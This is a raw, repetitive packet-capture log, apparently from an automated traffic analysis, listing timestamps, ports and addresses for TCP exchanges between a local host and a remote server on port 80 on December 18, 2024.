                                                                                        Dec 18, 2024 20:55:44.805037022 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.806140900 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.806147099 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.806323051 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.807681084 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.807687998 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.807842016 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.809051991 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.809057951 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.809107065 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.810493946 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.810509920 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.810583115 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.811824083 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.811835051 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.811860085 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.812484980 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.812493086 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.812531948 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.813117027 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.813124895 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.813174963 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.813698053 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.813704967 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.813764095 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.814449072 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.814455986 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.814510107 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.814975023 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.814982891 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.815196037 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.815640926 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.815701962 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.815892935 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.816719055 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.816777945 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.816905022 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.817789078 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.817858934 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.818751097 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.819139004 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.819145918 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.819334984 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.819854021 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.819962978 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.820329905 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.820894957 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.821085930 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.821155071 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.821867943 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.821979046 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.822122097 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.822880030 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.822941065 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.823232889 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.824862003 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.824873924 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.824918032 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.826109886 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.826117039 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.826172113 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.827337027 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.827353001 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.827399015 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.828780890 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.828787088 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.828860998 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.830235958 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.830245018 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.830297947 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.830936909 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.831155062 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.831657887 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.832310915 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.832385063 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.833086967 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.833758116 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.833765984 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.833844900 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.835149050 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.835156918 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.835263014 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.836570978 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.836577892 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.836642027 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.837304115 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.837388992 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.838052034 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.840595007 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.840605974 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.840645075 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.841442108 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.841449022 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.841507912 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.843060970 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.843077898 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.843141079 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.844306946 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.844369888 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.845726967 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.845742941 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.845755100 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.845809937 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.847137928 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.847203970 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.847225904 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.848759890 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.848767996 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.848835945 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.849678040 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.849685907 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.849735975 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.850218058 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.850224972 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.850236893 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.850287914 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.850863934 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.850871086 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.850927114 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.851408958 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.851416111 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.851485014 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.851885080 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.852972031 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.852983952 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.853014946 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.854043961 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.854051113 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.854265928 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.855082989 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.855089903 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.855166912 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.855583906 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.855629921 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.856127977 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.856687069 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.856796980 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.857348919 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.857893944 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.857906103 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.857930899 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.859258890 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.859266996 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.859332085 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.860599041 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.860606909 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.860658884 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.861443996 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.861620903 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.862076998 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.863375902 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.863485098 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.863982916 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.864656925 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.864815950 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.865240097 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.867054939 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.867063046 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.867151976 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.868052006 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.868061066 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.868118048 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.868767977 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.868957043 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.869437933 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.870399952 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.870472908 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.871165991 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.872539043 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.872545958 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.872600079 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.873878002 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.873894930 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.873934984 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.875298023 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.875305891 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.875344038 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.875998020 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.876094103 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.876606941 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.877197981 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.877286911 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.877734900 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.878345013 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.878353119 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.878442049 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.879755020 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.879761934 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.879848003 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.881227016 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.881241083 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.881314039 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.881942987 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.881993055 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.882599115 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.883280039 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.883342028 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.883964062 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.884741068 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.884748936 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.884820938 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.886111021 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.886117935 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.886205912 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.886847019 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.887284994 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.887535095 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.887542963 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.887609959 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.888233900 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.888242006 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.888475895 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.888963938 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.888971090 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.889070034 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.889669895 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.889707088 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.889741898 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.890398979 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.890408039 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.890479088 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.891150951 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.891789913 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.891889095 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.892512083 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.893172979 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.893184900 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.893233061 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.895401955 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.895410061 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.895534039 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.896766901 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.896775007 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.896914959 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.897504091 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.897624969 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.898288012 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.899043083 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.899167061 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.899596930 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.900275946 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.900294065 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.900357962 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.902431965 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.902439117 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.902542114 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.917308092 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.917320013 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.917422056 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.917433977 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.917445898 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.917454004 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.917460918 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.917460918 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.917505980 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:45.389614105 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:45.389713049 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.193629980 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.193695068 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.385714054 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.505985022 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.506397009 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.506405115 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.506417036 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.506452084 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.507170916 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.507178068 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.507190943 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.507230997 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.508012056 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.508019924 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.508027077 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.508065939 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.508923054 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.508930922 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.508977890 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.509263039 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.509269953 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.509283066 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.509407043 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.510061026 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.510114908 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.510828972 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.510835886 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.510848045 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.510886908 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.511653900 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.511662006 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.511674881 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.511708021 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.512474060 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.512514114 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.512521029 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.512531996 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.512665987 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.513370991 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.513408899 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.513416052 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.513479948 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.514312983 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.514321089 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.514333963 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.514368057 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.515084982 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.515090942 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.515288115 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.515978098 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.515986919 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.515993118 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.516026020 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.516778946 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.516812086 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.516824961 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.516830921 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.516901016 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.516901016 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.517673016 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.517680883 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.517688036 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.517797947 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.518578053 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.518584013 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.518651009 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.519385099 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.519392967 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.519404888 CET8049766139.99.188.124192.168.2.7
